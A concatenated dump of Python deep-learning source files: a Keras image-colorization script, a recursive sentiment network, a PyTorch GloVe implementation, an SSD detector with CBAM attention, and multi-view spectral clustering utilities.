Xtest = rgb2lab(1.0/255*X[split:])[:,:,:,0]
Xtest = Xtest.reshape(Xtest.shape+(1,))
Ytest = rgb2lab(1.0/255*X[split:])[:,:,:,1:]
# Set up model
N = 5
model = Sequential()
num_maps1 = [4, 8, 16, 32, 64]
num_maps2 = [8, 16, 32, 64, 128]
# Convolutional layers
for i in range(N):
if i == 0:
model.add(Convolution2D(num_maps1[i], 3, 3, border_mode='same', subsample=(2, 2), input_shape=(128, 128, 1)))
else:
model.add(Convolution2D(num_maps1[i], 3, 3, border_mode='same', subsample=(2, 2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(num_maps2[i], 3, 3, border_mode='same', subsample=(1, 1)))
model.add(BatchNormalization())
model.add(Activation('relu'))
# Upsampling layers
for i in range(N):
model.add(UpSampling2D(size=(2, 2)))
model.add(Convolution2D(num_maps2[-(i+1)], 3, 3, border_mode='same'))
model.add(BatchNormalization())
model.add(Activation('relu'))
if i != N-1:
model.add(Convolution2D(num_maps1[-(i+1)], 3, 3, border_mode='same'))
model.add(BatchNormalization())
model.add(Activation('relu'))
else:
model.add(Convolution2D(2, 3, 3, border_mode='same'))
# Finish model
model.compile(optimizer='rmsprop',
loss='mse')
# Generate training data
batch_size = 10
def image_a_b_gen(batch_size):
for batch in datagen.flow(Xtrain, batch_size=batch_size):
        if batch is None:
break
lab_batch = rgb2lab(batch)
X_batch = lab_batch[:,:,:,0]
Y_batch = lab_batch[:,:,:,1:]
yield (X_batch.reshape(X_batch.shape+(1,)), Y_batch)
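# Shapes produced by the generator above (for this dataset of 128x128 RGB crops):
# a batch of 10 images yields X_batch with shape (10, 128, 128, 1), the L (lightness)
# channel used as input, and Y_batch with shape (10, 128, 128, 2), the a/b chrominance
# channels used as the regression target.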
# Train model
model.fit_generator(
image_a_b_gen(batch_size),
samples_per_epoch=1000,
nb_epoch=15)
# Test model
print(model.evaluate(Xtest, Ytest, batch_size=batch_size))
output = model.predict(Xtest)
# Output colorizations
for i in range(len(output)):
cur = np.zeros((128, 128, 3))
cur[:,:,0] = Xtest[i][:,:,0]
cur[:,:,1:] = output[i]
imsave("colorizations/img_"+str(i)+".png", lab2rgb(cur))
imsave("colorizations/img_gray_"+str(i)+".png", rgb2gray(lab2rgb(cur)))
``` |
{
"source": "2014mchidamb/RecursiveRecursiveNets",
"score": 3
} |
#### File: 2014mchidamb/RecursiveRecursiveNets/recurnn.py
```python
from nltk.tokenize import word_tokenize
from torch.autograd import Variable
import csv
import spacy
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
# Set hyperparameters
embed_size = 100
batch_size = 20
l_rate = 0.001
num_epochs = 10
# Read in text data
text_file = open('sentiment_dataset.csv', 'r')
reader = csv.reader(text_file)
data = []
full_text = ''
for line in reader:
data.append(line)
full_text += line[-1]
text_file.close()
# Create vocabulary
word_list = word_tokenize(full_text.lower())
vocab = np.unique(word_list)
vocab_size = len(vocab)
print(vocab_size)
# Create word to index mapping
w_to_i = {word: ind for ind, word in enumerate(vocab)}
# Load text parser
nlp = spacy.load('en')
class RecurNN(nn.Module):
def __init__(self):
super(RecurNN, self).__init__()
self.embeddings = nn.Embedding(vocab_size, embed_size)
self.first_linear = nn.Linear(2*embed_size, embed_size)
self.tanh = nn.Tanh()
self.final_linear = nn.Linear(embed_size, 1)
self.sigmoid = nn.Sigmoid()
    def parse(self, sent):
doc = nlp(sent)
root = doc[0]
for word in doc:
if word.head == word:
root = word
break
return root
    def compose(self, a, b):
ab = torch.cat((a, b), 0)
out = self.first_linear(ab)
out = self.tanh(out)
return out
    def compute_vec(self, root):
lookup = torch.LongTensor([w_to_i[root.text]])
embed_vec = self.embeddings(lookup).view((1, -1))
        if len(list(root.children)) == 0:
return embed_vec
vec_list = []
        for child in root.children:
            vec_list.append(self.compute_vec(child))
            if len(vec_list) == 2:
                comp_vec = self.compose(vec_list[0], vec_list[1])
                vec_list.clear()
                vec_list.append(comp_vec)
        return self.compose(vec_list[-1], embed_vec)
def forward(self, x):
        final_vec = self.compute_vec(self.parse(x))
return self.sigmoid(self.final_linear(final_vec)).view((-1, 1))
model = RecurNN()
for epoch in range(num_epochs):
for line in data:
print(line)
        print(' '.join(word_tokenize(line[-1].lower())))
``` |
{
"source": "2014mchidamb/TorchGlove",
"score": 3
} |
#### File: 2014mchidamb/TorchGlove/glove.py
```python
from nltk.tokenize import word_tokenize
from torch.autograd import Variable
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.optim as optim
# Set parameters
context_size = 3
embed_size = 2
xmax = 2
alpha = 0.75
batch_size = 20
l_rate = 0.001
num_epochs = 10
# Open and read in text
text_file = open('short_story.txt', 'r')
text = text_file.read().lower()
text_file.close()
# Create vocabulary and word lists
word_list = word_tokenize(text)
vocab = np.unique(word_list)
w_list_size = len(word_list)
vocab_size = len(vocab)
# Create word to index mapping
w_to_i = {word: ind for ind, word in enumerate(vocab)}
# Construct co-occurence matrix
comat = np.zeros((vocab_size, vocab_size))
for i in range(w_list_size):
for j in range(1, context_size+1):
ind = w_to_i[word_list[i]]
if i-j > 0:
lind = w_to_i[word_list[i-j]]
comat[ind, lind] += 1.0/j
if i+j < w_list_size:
rind = w_to_i[word_list[i+j]]
comat[ind, rind] += 1.0/j
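# Worked example of the 1/j context weighting above: for the token sequence "a b c"
# with context_size >= 2, comat[a, b] gains 1.0 (distance 1) and comat[a, c] gains 0.5
# (distance 2), so nearer context words contribute more co-occurrence mass.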
# Non-zero co-occurrences
coocs = np.transpose(np.nonzero(comat))
# Weight function
def wf(x):
if x < xmax:
return (x/xmax)**alpha
return 1
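# The weighting above follows the GloVe paper's f(x) = (x / xmax)**alpha, capped at 1.
# With xmax = 2 and alpha = 0.75 as set here, wf(1) is about 0.59 and wf(3) is 1, so rare
# co-occurrences contribute less to the loss than frequent ones, up to the cap.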
# Set up word vectors and biases
l_embed, r_embed = [
[Variable(torch.from_numpy(np.random.normal(0, 0.01, (embed_size, 1))),
requires_grad = True) for j in range(vocab_size)] for i in range(2)]
l_biases, r_biases = [
[Variable(torch.from_numpy(np.random.normal(0, 0.01, 1)),
requires_grad = True) for j in range(vocab_size)] for i in range(2)]
# Set up optimizer
optimizer = optim.Adam(l_embed + r_embed + l_biases + r_biases, lr = l_rate)
# Batch sampling function
def gen_batch():
sample = np.random.choice(np.arange(len(coocs)), size=batch_size, replace=False)
l_vecs, r_vecs, covals, l_v_bias, r_v_bias = [], [], [], [], []
for chosen in sample:
ind = tuple(coocs[chosen])
l_vecs.append(l_embed[ind[0]])
r_vecs.append(r_embed[ind[1]])
covals.append(comat[ind])
l_v_bias.append(l_biases[ind[0]])
r_v_bias.append(r_biases[ind[1]])
return l_vecs, r_vecs, covals, l_v_bias, r_v_bias
# Train model
for epoch in range(num_epochs):
num_batches = int(w_list_size/batch_size)
avg_loss = 0.0
for batch in range(num_batches):
optimizer.zero_grad()
l_vecs, r_vecs, covals, l_v_bias, r_v_bias = gen_batch()
        # For pytorch v2, use .view(-1) in torch.dot here; otherwise .view(-1) is not needed.
loss = sum([torch.mul((torch.dot(l_vecs[i].view(-1), r_vecs[i].view(-1)) +
l_v_bias[i] + r_v_bias[i] - np.log(covals[i]))**2,
wf(covals[i])) for i in range(batch_size)])
avg_loss += loss.data[0]/num_batches
loss.backward()
optimizer.step()
print("Average loss for epoch "+str(epoch+1)+": ", avg_loss)
# Visualize embeddings
if embed_size == 2:
# Pick some random words
word_inds = np.random.choice(np.arange(len(vocab)), size=10, replace=False)
for word_ind in word_inds:
# Create embedding by summing left and right embeddings
w_embed = (l_embed[word_ind].data + r_embed[word_ind].data).numpy()
x, y = w_embed[0][0], w_embed[1][0]
plt.scatter(x, y)
plt.annotate(vocab[word_ind], xy=(x, y), xytext=(5, 2),
textcoords='offset points', ha='right', va='bottom')
plt.savefig("glove.png")
``` |
{
"source": "2014Vee/ssd-pytorch",
"score": 3
} |
#### File: 2014Vee/ssd-pytorch/ssd.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import os
from layers import *
from data import voc # coco
###############################################################################
# Channel attention module
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
        # the feature map goes through max pooling and average pooling, each producing a 1x1xC tensor
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
        # a shared MLP then reduces and restores the channel dimension to fuse the two descriptors
self.fc1 = nn.Conv2d(in_planes, in_planes // 16, 1, bias=False)
self.relu1 = nn.ReLU()
self.fc2 = nn.Conv2d(in_planes // 16, in_planes, 1, bias=False)
        # activation
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))
max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))
        out = avg_out + max_out  # element-wise sum of the two pooled descriptors
return self.sigmoid(out)
# Spatial attention module
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
        assert kernel_size in (3, 7), 'kernel size must be 3 or 7'  # only kernel sizes 3 and 7 are supported
padding = 3 if kernel_size == 7 else 1
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=padding, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
        max_out, _ = torch.max(x, dim=1, keepdim=True)  # torch.max returns both the values and their indices
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
# Bottleneck passes the feature map through channel attention first, then spatial attention
class Bottleneck(nn.Module):  # chains the channel attention and spatial attention modules
def __init__(self, inplanes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.ca = ChannelAttention(inplanes)
self.sa = SpatialAttention()
self.stride = stride
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
        save = x  # keep the original feature map for the residual connection
        out = self.ca(x) * x  # channel attention first
        out = self.sa(out) * out  # then spatial attention
        out += save  # residual connection (the original author questioned whether this should be a multiplication instead)
        out = self.relu(out)  # final ReLU activation
        return out  # output has the same spatial size and channel count as the input
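# Illustrative shape check for the CBAM block above (the tensor size is an arbitrary example):
#   feat = torch.randn(1, 512, 38, 38)
#   out = Bottleneck(512)(feat)   # out.shape == feat.shape
# Channel and spatial attention only re-weight the features, so the shape is unchanged.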
############################# SSD with CBAM feature-attention modules ######################
class SSD(nn.Module):
"""Single Shot Multibox Architecture
The network is composed of a base VGG network followed by the
added multibox conv layers. Each multibox layer branches into
1) conv2d for class conf scores
2) conv2d for localization predictions
3) associated priorbox layer to produce default bounding
boxes specific to the layer's feature map size.
    The SSD model is built on a VGG backbone with its fully connected layers removed,
    followed by the added multibox layers. Each multibox branch is:
    1) a conv2d producing class confidence scores
    2) a conv2d producing box coordinate predictions
    3) an associated priorbox layer producing default bounding boxes specific to that feature map size
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
Args:
phase: (string) Can be "test" or "train"
        size: input image size
        base: VGG16 layers for input, size of either 300 or 500 (the modified VGG backbone)
        extras: extra layers that feed to multibox loc and conf layers
            (the layers newly added after the VGG backbone)
        head: "multibox head" consists of loc and conf conv layers
            (loc_layers, conf_layers): the classification and regression layers
            applied to the vgg and extras feature maps
"""
def __init__(self, phase, size, base, extras, head, num_classes):
super(SSD, self).__init__()
self.phase = phase
self.num_classes = num_classes
self.cfg = voc
        # PriorBox generates, for every feature map, the default boxes (center coordinates and offsets)
self.priorbox = PriorBox(self.cfg)
        # calling its forward returns the generated default boxes
        # for every prediction feature map it stores the default boxes of the different aspect ratios (i.e. the anchors)
self.priors = Variable(self.priorbox.forward(), volatile=True)
# 300
self.size = size
        # SSD network
        # the modified VGG backbone
self.vgg = nn.ModuleList(base) ################################################
# Layer learns to scale the l2 normalized features from conv4_3
        # in the paper conv4_3 has a different feature scale from the other layers, so the ParseNet L2 normalization technique is used:
        # every position of the conv4_3 feature map is L2-normalized to scale 20, and this scale is learned during back-propagation
self.L2Norm = L2Norm(512, 20)
        # the extra layers newly added after the VGG backbone
self.extras = nn.ModuleList(extras)
        # the classification and regression layers applied to vgg and extras
self.loc = nn.ModuleList(head[0])
self.conf = nn.ModuleList(head[1])
        # if the network is used for testing, add softmax and detection
if phase == 'test':
self.softmax = nn.Softmax(dim=-1)
self.detect = Detect(num_classes, 0, 200, 0.01, 0.45)
        # ===== added feature-fusion layers =====
        # pool2 -> conv4_3: dilated convolution, halves the spatial size
self.DilationConv_128_128 = nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=2, dilation=2,
stride=2)
        # conv4_3 -> conv4_3: size unchanged
self.conv_512_256 = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, padding=1, stride=1)
        # fc7 -> conv4_3: transposed-convolution upsampling, doubles the size
self.DeConv_1024_128 = nn.ConvTranspose2d(in_channels=1024, out_channels=128, kernel_size=2, stride=2)
        # conv4_3 -> fc7: dilated convolution, halves the size
self.DilationConv_512_128 = nn.Conv2d(in_channels=512, out_channels=128, kernel_size=3, padding=2, dilation=2,
stride=2)
        # fc7 -> fc7: size unchanged
self.conv_1024_256 = nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=3, padding=1, stride=1)
        # conv8_2 -> fc7: transposed-convolution upsampling, doubles the size (10 -> 19)
self.DeConv_512_128 = nn.ConvTranspose2d(in_channels=512, out_channels=128, kernel_size=3, stride=2, padding=1)
        # conv5_3 -> conv8_2
self.DilationConv_512_128_2 = nn.Conv2d(in_channels=512, out_channels=128, kernel_size=3, padding=2, dilation=2,
stride=2)
        # conv8_2 -> conv8_2: size unchanged
self.conv_512_256_2 = nn.Conv2d(in_channels=512, out_channels=256, kernel_size=3, padding=1, stride=1)
        # conv9_2 -> conv8_2
self.DeConv_256_128_2 = nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=2, stride=2)
        # smoothing layer
self.smooth = nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1)
        # the BatchNorm layer is parameterized by its number of output channels
self.bn = nn.BatchNorm2d(128)
        # CBAM modules for the 6 prediction feature maps: 512 512 512 256 256 256
self.CBAM1 = Bottleneck(512)
self.CBAM2 = Bottleneck(512)
self.CBAM3 = Bottleneck(512)
self.CBAM4 = Bottleneck(256)
self.CBAM5 = Bottleneck(256)
self.CBAM6 = Bottleneck(256)
def forward(self, x):
"""Applies network layers and ops on input image(s) x.
        Forward pass
Args:
x: input image or batch of images. Shape: [batch,3,300,300].
Return:
Depending on phase:
            test:
Variable(tensor) of output class label predictions,
confidence score, and corresponding location predictions for
each object detected. Shape: [batch,topk,7]
            train:
list of concat outputs from:
                1: confidence layers, Shape: [batch*num_priors,num_classes]
                2: localization layers, Shape: [batch,num_priors*4]
                3: priorbox layers, Shape: [2,num_priors*4]
"""
        # sources stores the feature maps produced at the selected layers, which are used later for classification and regression
sources = list()
        # loc and conf store the outputs of the regression and classification heads for each prediction feature map
loc = list()
conf = list()
        # in the original paper, L2 normalization is added after the relu of conv4_3 in vgg, and that feature map is saved
        # apply vgg up to conv4_3 relu
        # save the vgg feature maps
        # k ranges over 0-22
        # ========= start saving all the intermediate results that are needed
        # save the pool2 output (pool indices start at 1)
        # it comes after a maxpool, so no L2Norm is needed
for k in range(10):
x = self.vgg[k](x)
sources.append(x)
        # save the conv4_3 output
for k in range(10, 23):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
        # save the conv5_3 output; as with conv4_3 in the original repo, apply L2Norm
for k in range(23, 30):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
        # save the output of the original fc7
        # apply vgg up to fc7, i.e. the conv layer that replaced fc7; save the result after relu
        # k ranges from 30 to the end
for k in range(30, len(self.vgg)):
x = self.vgg[k](x)
sources.append(x)
        # save the outputs of the newly added layers conv8_2, conv9_2, conv10_2, conv11_2
# apply extra layers and cache source layer outputs
        # save the feature maps of the added layers
for k, v in enumerate(self.extras):
            # apply relu after every conv
x = F.relu(v(x), inplace=True)
            # as in the paper, save the output of every other conv
if k % 2 == 1:
sources.append(x)
        # at this point sources holds all intermediate results: pool2, conv4_3, conv5_3, fc7, conv8_2, conv9_2, conv10_2, conv11_2
        # sources_final holds the final fused feature maps
sources_final = list()
        # fused result for conv4_3; the branches are concatenated along the channel dimension
conv4_fp = torch.cat((F.relu(self.bn(self.DilationConv_128_128(sources[0])), inplace=True),
F.relu(self.conv_512_256(sources[1]), inplace=True),
F.relu(self.DeConv_1024_128(sources[3]), inplace=True)), 1)
# sources_final.append(F.relu( self.smooth(conv4_fp) , inplace=True))
conv4_fp = F.relu(self.smooth(conv4_fp), inplace=True)
sources_final.append(self.CBAM1(conv4_fp))
        # fused result for fc7
fc7_fp = torch.cat((F.relu(self.bn(self.DilationConv_512_128(sources[1])), inplace=True),
F.relu(self.conv_1024_256(sources[3]), inplace=True),
F.relu(self.DeConv_512_128(sources[4]), inplace=True)), 1)
# sources_final.append(F.relu( self.smooth(fc7_fp) , inplace=True))
fc7_fp = F.relu(self.smooth(fc7_fp), inplace=True)
sources_final.append(self.CBAM2(fc7_fp))
        # fused result for conv8_2
conv8_fp = torch.cat((F.relu(self.bn(self.DilationConv_512_128_2(sources[2])), inplace=True),
F.relu(self.conv_512_256_2(sources[4]), inplace=True),
F.relu(self.DeConv_256_128_2(sources[5]), inplace=True)), 1)
# sources_final.append(F.relu( self.smooth(conv8_fp) , inplace=True))
conv8_fp = F.relu(self.smooth(conv8_fp), inplace=True)
sources_final.append(self.CBAM3(conv8_fp))
        # save conv9_2, conv10_2, conv11_2
sources_final.append(self.CBAM4(sources[5]))
sources_final.append(self.CBAM5(sources[6]))
sources_final.append(self.CBAM6(sources[7]))
# apply multibox head to source layers
        # permute reorders the tensor dimensions according to the given order
        # contiguous returns a memory-contiguous tensor with the same data
        # sources_final holds the output feature map of every prediction layer
        # loc uses the feature maps to predict box regression
        # conf uses the feature maps to predict classification
for (x, l, c) in zip(sources_final, self.loc, self.conf):
loc.append(l(x).permute(0, 2, 3, 1).contiguous())
conf.append(c(x).permute(0, 2, 3, 1).contiguous())
        # concatenate the tensor sequence along the given dimension; dim=1 concatenates along columns
loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)
conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)
        # output in test phase
if self.phase == "test":
output = self.detect(
loc.view(loc.size(0), -1, 4), # loc preds 定位的预测
self.softmax(conf.view(conf.size(0), -1,
self.num_classes)), # conf preds 分类的预测
self.priors.type(type(x.data)) # default boxes 预测框
)
else:
            # output in train phase
output = (
                loc.view(loc.size(0), -1, 4),  # loc preds [32,8732,4]: localization predictions from the network
                conf.view(conf.size(0), -1, self.num_classes),  # conf preds [32,8732,21]: classification predictions from the network
                self.priors  # anchors [8732,4] generated per feature map by the prior-box formula: center coordinates and width/height
)
return output
def load_weights(self, base_file):
other, ext = os.path.splitext(base_file)
if ext == '.pkl' or '.pth':
print('Loading weights into state dict...')
self.load_state_dict(torch.load(base_file, map_location=lambda storage, loc: storage))
print('Finished!')
else:
print('Sorry only .pth and .pkl files supported.')
# This function is derived from torchvision VGG make_layers()
# https://github.com/pytorch/vision/blob/master/torchvision/models/vgg.py
def vgg(cfg, i, batch_norm=False):
'''
    the VGG structure
    cfg: the VGG configuration
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
    i: 3, the number of input image channels
    batch_norm: False by default; if True, batch normalization layers are added to the network
    returns the VGG network without the fully connected layers
'''
    # holds all the VGG layers
layers = []
    # number of input image channels
in_channels = i
    for v in cfg:  # 'M' and 'C' change the size of the generated feature maps
        if v == 'M':  # max pooling layer, default floor mode
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
        elif v == 'C':  # max pooling layer in ceil mode; see https://blog.csdn.net/GZHermit/article/details/79351803 for the two maxpool modes
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
            # convolution
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
    # the paper changes the pool5 layer from a 2x2 kernel with stride 2 to a 3x3 kernel with stride 1 plus padding
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
    # the paper converts VGG's FC6 and FC7 layers into the conv layers conv6 and conv7, and initializes them by subsampling the FC6/FC7 parameters
    # input channels 512, output channels 1024, kernel 3, padding 6; dilation is the spacing between kernel elements
    # changing the pool5 parameters changes the receptive field, so conv6 uses the atrous (dilated) convolution algorithm
    # atrous convolution dilates the kernel weights, e.g. a 3x3 kernel effectively becomes 7x7, so the receptive field grows while the score map stays large, i.e. the output becomes dense
    # the benefit is a dense output score map with a receptive field that does not shrink (and can even grow), which matters a lot for segmentation and detection
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
    # input channels 1024, output channels 1024, kernel 1
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
    # append the modified layers to the VGG network as well
layers += [pool5, conv6,
nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]
return layers
def add_extras(cfg, i, batch_norm=False):
'''
    the extra layers newly added after the VGG network
:param cfg: '300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
    :param i: 1024, the number of input channels
    :param batch_norm: False
:return:
'''
    # extra layers added to VGG for feature scaling
layers = []
    # 1024 input channels
in_channels = i
    # flag selects the kernel size from the pair (1, 3); it flips every iteration, so the conv kernel sizes alternate 1, 3, 1, 3
    # False selects 1, True selects 3
    # in the SSD network diagram, s1 means stride 1 and s2 means stride 2
    # in this code 'S' marks stride 2 and its absence means the default stride 1, so cfg matches the paper's network structure exactly
flag = False
    # enumerate: k is the index, v is the value
for k, v in enumerate(cfg):
if in_channels != 'S':
if v == 'S':
layers += [nn.Conv2d(in_channels, cfg[k + 1],
kernel_size=(1, 3)[flag], stride=2, padding=1)]
else:
layers += [nn.Conv2d(in_channels, v, kernel_size=(1, 3)[flag])]
flag = not flag
in_channels = v
return layers
def multibox(vgg, extra_layers, cfg, num_classes):
'''
    :param vgg: the modified VGG network (fully connected layers removed, pool5 changed, new layers added)
    :param extra_layers: the extra layers newly added after the VGG network
    :param cfg: '300': [4, 6, 6, 6, 4, 4], how many boxes each grid cell predicts on the different feature maps
    :param num_classes: 20 classes + 1 background, 21 in total
:return:
'''
    # holds all the layers that take part in prediction
loc_layers = []
conf_layers = []
    # in the modified VGG network, the layers used for prediction are layer 21 and the second-to-last layer
vgg_source = [21, -2]
for k, v in enumerate(vgg_source):
        # following the FP-SSD paper, the 1024 channels are replaced by 512
if k == 1:
in_channels = 512
else:
in_channels = vgg[v].out_channels
        # 4 is the number of regression coordinates; cfg gives how many boxes each grid cell of this feature map predicts
loc_layers += [nn.Conv2d(in_channels,
cfg[k] * 4, kernel_size=3, padding=1)]
        # num_classes is the number of classes; cfg gives how many boxes each grid cell of this feature map predicts
conf_layers += [nn.Conv2d(in_channels,
cfg[k] * num_classes, kernel_size=3, padding=1)]
    # [x::y] takes every y-th element starting from index x
    # in the paper, the newly added layers also contribute one prediction layer every other layer
    # add the prediction layers for the newly added extra layers as well; start=2 is the starting index
for k, v in enumerate(extra_layers[1::2], 2):
loc_layers += [nn.Conv2d(v.out_channels, cfg[k]
* 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(v.out_channels, cfg[k]
* num_classes, kernel_size=3, padding=1)]
return vgg, extra_layers, (loc_layers, conf_layers)
base = {
    # the numbers are the channel counts of each layer; M is a max pooling layer (default floor mode), C a max pooling layer (ceil mode); the final maxpool, fc, fc, fc, softmax of vgg16 are removed
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
'512': [],
}
extras = {
    # each feature map is produced by two convs, a conv1x1 and a conv3x3
'300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
'512': [],
}
mbox = {
    '300': [4, 6, 6, 6, 4, 4],  # how many boxes each grid cell predicts on the different feature maps
'512': [],
}
def build_ssd(phase, size=300, num_classes=21):
'''
    Build the SSD model
'''
    # train or test
if phase != "test" and phase != "train":
print("ERROR: Phase: " + phase + " not recognized")
return
    # currently SSD300 only supports training on 300x300 inputs
if size != 300:
print("ERROR: You specified size " + repr(size) + ". However, " +
"currently only SSD300 (size=300) is supported!")
return
    # base_: the modified VGG network (fully connected layers removed, pool5 changed, new layers added)
    # extras_: the extra layers newly added after the VGG network
    # head_: (loc_layers, conf_layers), the classification and regression layers from vgg and extras
base_, extras_, head_ = multibox(vgg(base[str(size)], 3),
add_extras(extras[str(size)], 1024),
mbox[str(size)],
num_classes)
    # phase: 'train', size: 300, num_classes: 21 (20 classes + 1 background)
return SSD(phase, size, base_, extras_, head_, num_classes)
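# Illustrative construction sketch (commented out so importing this module has no side effects;
# whether a full forward pass runs depends on the layers/ and data/ modules shipped with this repo):
# net = build_ssd('train', size=300, num_classes=21)
# loc_preds, conf_preds, priors = net(torch.randn(1, 3, 300, 300))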
``` |
{
"source": "201518015029022/zzzzzz",
"score": 3
} |
#### File: zzzzzz/core/data.py
```python
import numpy as np
import scipy.io as sio
from keras import backend as K
from keras.models import model_from_json
from core import util
from core import pairs
def get_data(params):
'''
load data
data_list contains the multi-view data for SiameseNet and MvSCN
'''
# data list (views)
data_list = []
if params['views'] is None:
params['views'] = range(1, params['view_size']+1)
for i in params['views']:
view_name = 'view'+str(i)
print('********', 'load', params['dset'], view_name, '********')
ret = {}
x_train, y_train, x_test, y_test = load_data(params, i)
print('data size (training, testing)', x_train.shape, x_test.shape)
# Using the low-dimension data via AE
if params['use_code_space']:
all_data = [x_train, x_test]
for j, d in enumerate(all_data):
all_data[j] = embed_data(d, dset=params['dset'] , view_name=view_name)
x_train, x_test = all_data
# data for MvSCN
ret['spectral'] = (x_train, y_train, x_test, y_test)
# prepare the training pairs for SiameseNet
ret['siamese'] = {}
pairs_train, dist_train = pairs.create_pairs_from_unlabeled_data(
x1=x_train,
k=params['siam_k'],
tot_pairs=params['siamese_tot_pairs'],
)
# data for SiameseNet
ret['siamese'] = (pairs_train, dist_train)
data_list.append(ret)
return data_list
def load_data(params, view):
'''
load data for training and testing
'''
# multi-view
if params['dset'] == 'noisymnist':
data = util.load_data('noisymnist_view'+str(view)+'.gz', 'https://www2.cs.uic.edu/~vnoroozi/noisy-mnist/noisymnist_view'+str(view)+'.gz')
train_set_x, train_set_y = data[0]
valid_set_x, valid_set_y = data[1]
test_set_x, test_set_y = data[2]
train_set_x, train_set_y = np.concatenate((train_set_x, valid_set_x), axis=0), np.concatenate((train_set_y, valid_set_y), axis=0)
elif params['dset'] == 'Caltech101-20':
mat = sio.loadmat('./data/'+params['dset']+'.mat')
X = mat['X'][0]
x = X[view-1]
x = util.normalize(x)
y = np.squeeze(mat['Y'])
# split it into two partitions
data_size = x.shape[0]
train_index, test_index = util.random_index(data_size, int(data_size*0.5), 1)
test_set_x = x[test_index]
test_set_y = y[test_index]
train_set_x = x[train_index]
train_set_y = y[train_index]
else:
raise ValueError('Dataset provided ({}) is invalid!'.format(params['dset']))
return train_set_x, train_set_y, test_set_x, test_set_y
def embed_data(x, dset, view_name):
'''
obtain the AE features
'''
if x is None:
return None
if not x.shape[0]:
return np.zeros(shape=(0, 10))
# use pretrained autoencoder from DEC
json_path = './pretrain/ae/'+dset+'/ae_{}.json'.format(dset+'_'+view_name)
weights_path = './pretrain/ae/'+dset+'/ae_{}_weights.h5'.format(dset+'_'+view_name)
with open(json_path) as f:
pt_ae = model_from_json(f.read())
pt_ae.load_weights(weights_path)
x = x.reshape(-1, np.prod(x.shape[1:]))
get_embeddings = K.function([pt_ae.input],
[pt_ae.layers[4].output])
x_embedded = predict_with_K_fn(get_embeddings, x)[0]
del pt_ae
return x_embedded
def predict_with_K_fn(K_fn, x, bs=1000):
'''
Convenience function: evaluates x by K_fn(x), where K_fn is
a Keras function, by batches of size 1000.
'''
if not isinstance(x, list):
x = [x]
num_outs = len(K_fn.outputs)
y = [np.empty((x[0].shape[0], output_.get_shape()[1])) for output_ in K_fn.outputs]
recon_means = []
for i in range(int(x[0].shape[0]/bs + 1)):
x_batch = []
for x_ in x:
x_batch.append(x_[i*bs:(i+1)*bs])
temp = K_fn(x_batch)
for j in range(num_outs):
y[j][i*bs:(i+1)*bs] = temp[j]
return y
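# Batching behaviour of the helper above (hypothetical shapes): a K.function mapping a
# (n, 784) input to a (n, 10) embedding is evaluated in chunks of bs=1000 rows, so the
# output arrays are filled incrementally and memory use stays bounded for large n.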
```
#### File: zzzzzz/core/layer.py
```python
import numpy as np
import tensorflow as tf
from keras.regularizers import l2
from keras.layers import Dense, BatchNormalization, Flatten, Conv2D, MaxPooling2D, Lambda, Dropout
from keras import backend as K
def Orthogonal_op(x, epsilon=1e-4):
'''
Computes a matrix that orthogonalizes the input matrix x
x: an n x d input matrix
eps: epsilon to prevent nonzero values in the diagonal entries of x
returns: a d x d matrix, ortho_weights, which orthogonalizes x by
right multiplication
'''
x_2 = K.dot(K.transpose(x), x)
x_2 += K.eye(K.int_shape(x)[1])*epsilon
L = tf.cholesky(x_2)
ortho_weights = tf.transpose(tf.matrix_inverse(L)) * tf.sqrt(tf.cast(tf.shape(x)[0], dtype=K.floatx()))
return ortho_weights
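# Sketch of the property computed above: with L the Cholesky factor of (x^T x + eps*I),
# the returned W = (L^{-1})^T * sqrt(n) satisfies (xW)^T (xW) ~= n * I, i.e. x is
# orthogonalized (up to the sqrt(n) scaling) by right-multiplication with W.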
def Orthogonal(x, name=None):
'''
Builds keras layer that handles orthogonalization of x
